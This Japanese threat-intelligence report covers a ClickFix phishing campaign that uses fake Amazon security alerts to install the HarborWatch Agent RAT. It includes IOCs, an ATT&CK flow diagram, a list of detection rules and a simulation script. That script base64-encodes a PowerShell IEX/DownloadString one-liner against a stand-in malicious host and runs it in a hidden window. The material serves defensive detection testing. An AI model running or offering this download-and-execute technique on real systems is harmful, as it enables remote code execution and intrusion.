フォローする 
概要
このレポートは、偽のAmazonセキュリティ警告を利用したフィッシングキャンペーンで、ClickFixスタイルのプロンプトを通じて被害者にPowerShellコマンドを実行させる手口の詳細を説明しています。そのコマンドは、 mysql.exeという名前の悪意のある実行可能ファイルをダウンロードします。実際はHarborWatch Agent RATです。起動されると、マルウェアはコマンド&コントロールサーバーに接続し、ホスト情報を送信します。この作戦は、類似ドメインとユーザー主導の自己感染方法に依存しており、従来の添付ファイルベースの検出を回避します。
調査
Cofenseは、偽装された送信元アドレスから悪意のあるドメイン、PowerShellダウンローダー、最終的なマルウェアペイロードまでのキャンペーンを追跡しました。 mysql.exe の動的分析により、コマンド&コントロールサーバーへのアウトバウンド通信が明らかになりました。 185.193.127.44 およびAPIパスの使用 /api/agent/tasks/ and /api/heartbeat. メモリ解析では識別子 HarborWatchAgent/c-1.1.1.
緩和策
組織は、特定された悪意のあるドメインとIPアドレスをブロックし、エンコードされたコマンドのPowerShell実行を制限し、 mysql.exe の予期しない作成を監視し、偽装アラートに対する電子メール防御を強化する必要があります。 Temp ディレクトリ内
対応
このアクティビティが検出された場合、影響を受けたエンドポイントを隔離し、HarborWatch Agentプロセスを終了し、法医学的証拠を収集し、環境全体でインジケータベースのブロックを展開する必要があります。また、ユーザーに偽のAmazonセキュリティ警告について警告し、フィッシング保護を更新して同様の誘導を捉える必要があります。
「グラフTB %% クラス定義 クラス定義アクションの塗りつぶし:#99ccff クラス定義マルウェアの塗りつぶし:#ff6666 クラス定義プロセスの塗りつぶし:#ffcc99 クラス定義ファイルの塗りつぶし:#cccccc %% ノード initial_access_phishing[「行動 – T1566.002 スピアフィッシングリンク
メールはAmazonからのように見え、悪意のある検証リンクを含んでいます。」] クラス initial_access_phishing アクション
user_execution_malicious_link[「行動 – T1204.001 ユーザーの実行:悪意のあるリンク
被害者はリンクをクリックし、PowerShellコマンドをコピー&ペーストするよう指示されるページに誘導されます。」] クラス user_execution_malicious_link アクション
user_execution_copy_paste[「行動 – T1204.004 ユーザーの実行:コピー&ペースト
コピーしたPowerShellコマンドがローカルで実行されます。」] クラス user_execution_copy_paste アクション
obfuscation_obfuscated_files[「行動 – T1027 難読化されたファイルまたは情報 & T1027.018 見えないUnicode
PowerShellコマンドはbase64でエンコードされ、隠れたUnicode文字を含んでいます。」] クラス obfuscation_obfuscated_files アクション
deobfuscate_decode[「行動 – T1140 デオブスク/デコード ファイルまたは情報
コマンドは実行時にペイロードをデコードします。」] クラス deobfuscate_decode アクション
hide_artifact_hidden_window[「行動 – T1564.003 隠しウィンドウ
PowerShellはUIを避けるために-w hiddenで実行されます。」] クラス hide_artifact_hidden_window アクション
ingress_tool_transfer[「行動 – T1105 侵入ツール転送
スクリプトはリモートサーバーから2段階のPowerShellスクリプト(code.txt)をダウンロードします。」] クラス ingress_tool_transfer アクション
server_software_component[「行動 – T1505 サーバー ソフトウェア コンポーネント
2番目のスクリプトは、%TEMP%に配置されたペイロード(mysql.exe)を取得して実行します。」] クラス server_software_component アクション
remote_access_tool[「マルウェア – T1219 リモートアクセスツール
カスタムRATのHarborWatch Agentが実行されます。」] クラス remote_access_tool マルウェア
discovery_security_software[「行動 – T1518.001 セキュリティソフトウェアの発見
RATがセキュリティソフトウェア情報を収集します。」] クラス discovery_security_software アクション
discovery_hardware[「行動 – T1592.001 ハードウェアの発見
RATがホストのハードウェア詳細を収集します。」] クラス discovery_hardware アクション
discovery_network_appliances[「行動 – T1590.006 ネットワークセキュリティ機器
RATがネットワークセキュリティデバイスを列挙します。」] クラス discovery_network_appliances アクション
discovery_log_enumeration[「行動 – T1654 ログ列挙
RATがイベントログを列挙します。」] クラス discovery_log_enumeration アクション
discovery_threat_vendor[「行動 – T1681 脅威ベンダーデータの検索
RATが脅威インテリジェンスを検索します。」] クラス discovery_threat_vendor アクション
c2_bidirectional[「行動 – T1102.002 ウェブサービスの双方向通信
データはHTTPSを介してC2サーバーに送信されます。」] クラス c2_bidirectional アクション
c2_oneway[「行動 – T1102.003 ウェブサービスのワンウェイ通信
追加の指示がHTTPSで取得されます。」] クラス c2_oneway アクション
c2_dynamic_resolution[「行動 – T1568 動的解決
RATが実行時にC2ドメインを解決します。」] クラス c2_dynamic_resolution アクション
c2_dga[「行動 – T1568.002 ドメイン生成アルゴリズム
ドメインリストがアルゴリズミックに生成されます。」] クラス c2_dga アクション
c2_dead_drop_resolver[「行動 – T1102.001 デッドドロップ レゾルバ
デッド ドロップ サイトから追加のC2指示を取得します。」] クラス c2_dead_drop_resolver アクション
exfiltration_c2[「行動 – T1041 C2チャネルを介した情報流出
収集された情報は同じウェブチャネルを介して流出されます。」] クラス exfiltration_c2 アクション
exfiltration_alternative[「行動 – T1048 代替プロトコルを介した情報流出
データ流出のために代替プロトコルが使用されます。」] クラス exfiltration_alternative アクション
discovery_cloud_dashboard[「行動 – T1538 クラウドサービスダッシュボード
データは中国語のウェブパネル(Harbor Sentinel)に表示されます。」] クラス discovery_cloud_dashboard アクション
%% 接続
initial_access_phishing –>|リードする| user_execution_malicious_link
user_execution_malicious_link –>|リードする| user_execution_copy_paste
user_execution_copy_paste –>|引き金| obfuscation_obfuscated_files
obfuscation_obfuscated_files –>|デコードされ| deobfuscate_decode
deobfuscate_decode –>|実行する| hide_artifact_hidden_window
hide_artifact_hidden_window –>|ダウンロードする| ingress_tool_transfer
ingress_tool_transfer –>|ダウンロードする| server_software_component
server_software_component –>|実行する| remote_access_tool
remote_access_tool –>|実行する| discovery_security_software
remote_access_tool –>|実行する| discovery_hardware
remote_access_tool –>|実行する| discovery_network_appliances
remote_access_tool –>|実行する| discovery_log_enumeration
remote_access_tool –>|実行する| discovery_threat_vendor
remote_access_tool –>|通信する| c2_bidirectional
remote_access_tool –>|受信する| c2_oneway
c2_bidirectional –>|使用する| c2_dynamic_resolution
c2_dynamic_resolution –>|使用する| c2_dga
c2_oneway –>|使用する| c2_dead_drop_resolver
remote_access_tool –>|流出する| exfiltration_c2
exfiltration_c2 –>|また使用するかもしれません| exfiltration_alternative
remote_access_tool –>|報告する| discovery_cloud_dashboard
」
攻撃フロー
検出
コマンドライン上の可能なClickFix攻撃パターン(cmdline経由)
表示
隠されたPowerShellコマンドラインを通じた実行の可能性(cmdline経由)
表示
疑わしいPowershell文字列(cmdline経由)
表示
疑わしいPowershell文字列(powershell経由)
表示
.NETの疑わしいメソッドをPowershellから呼び出す(powershell経由)
表示
IOCs (HashSha256) を検出するために: 偽のAmazonセキュリティアラートからHarborWatch AgentへのClickFix配信カスタムモニタリングRAT
表示
IOCs (HashMd5) を検出するために: 偽のAmazonセキュリティアラートからHarborWatch AgentへのClickFix配信カスタムモニタリングRAT
表示
IOCs (SourceIP) を 検出するために: 偽のAmazonセキュリティアラートからHarborWatch AgentへのClickFix配信カスタムモニタリングRAT
表示
IOCs (DestinationIP) を検出するために: 偽のAmazonセキュリティアラートからHarborWatch AgentへのClickFix配信カスタムモニタリングRAT
表示
特定のパスワード引数で実行されたmysql.exe [Windowsプロセス作成]
表示
HarborWatch Agent C2通信検出 [Windowsネットワーク接続]
表示
難読化と隠しウィンドウを伴うPowerShellの実行を検出 [Windows Powershell]
表示
シミュレーション実行
条件: テレメトリー&ベースライン事前チェックが合格している必要があります。
理論: このセクションでは、検出ルールをトリガーするように設計された敵の技術(TTP)の正確な実行を詳細に説明します。コマンドと説明は、特定されたTTPsを直接反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目的とします。
-
攻撃の流れとコマンド:
攻撃者は、エンドポイントに足場を得て、ユーザーから隠れながら悪意のあるペイロードをダウンロードして実行したいと思っています。彼らは次のようにPowerShellのワンライナーを作成します:- 実行 プロファイルなし (
-nop) 以外のユーザープロファイルをロードしないように。 - 開始 隠しウィンドウで (
-w hidden) UIの露出を防ぐ(T1564.003)。 - 次を埋め込む base64でエンコード リバースシェルスクリプト。単純な文字検出を回避(T1027.010)。
- デコードされたスクリプトを
-EncodedCommand経由で実行し、PowerShellを署名済みのバイナリとして活用(T1218)。
作成されたコマンドラインは、Sigmaルールの
CommandLine|containsフィルターに一致し、期待された警告を生成します。 - 実行 プロファイルなし (
-
回帰テストスクリプト:
# ------------------------------------------------- # 悪意のあるPowerShellの実行はSigmaルールをトリガーするはずです # ------------------------------------------------- $payload = 'IEX (New-Object Net.WebClient).DownloadString("http://malicious.example.com/payload.ps1")' $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload)) $cmd = "-nop -w hidden -EncodedCommand $b64" Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" ` -ArgumentList $cmd ` -WindowStyle Hidden # スクリプトの終了 -
クリーンアップコマンド:
# 素早く残存する悪意のあるPowerShellプロセスを終了 Get-Process -Name powershell -ErrorAction SilentlyContinue | Stop-Process -Force # 任意の一時ファイルを削除(この場合は作成されませんでした) # このセッションからbase64ペイロード変数を削除(オプション) Remove-Variable -Name b64 -ErrorAction SilentlyContinue